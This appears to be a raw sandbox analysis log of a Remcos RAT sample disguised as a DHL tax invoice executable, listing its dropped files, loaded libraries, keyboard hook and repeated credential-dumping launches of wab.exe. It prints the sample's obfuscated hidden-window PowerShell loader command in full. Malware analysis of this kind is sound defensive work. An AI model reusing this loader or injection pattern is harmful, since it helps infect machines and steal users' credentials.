              Source: powershell.exe, 00000001.00000002.2314356147.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040541C

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7824, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: wab.exeProcess created: 72

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: DHL TAX INVOICES - MARCH 2024.exe
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exeJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_004068460_2_00406846
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_00404C590_2_00404C59
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_008FF4F81_2_008FF4F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_008FEDB01_2_008FEDB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0702CF181_2_0702CF18
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: DHL TAX INVOICES - MARCH 2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5988/15@1/3
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046DD
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeFile created: C:\Users\user\AppData\Local\releveJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-EEMA4A
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsw3EAC.tmpJump to behavior
              Source: DHL TAX INVOICES - MARCH 2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: DHL TAX INVOICES - MARCH 2024.exeVirustotal: Detection: 13%
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeFile read: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
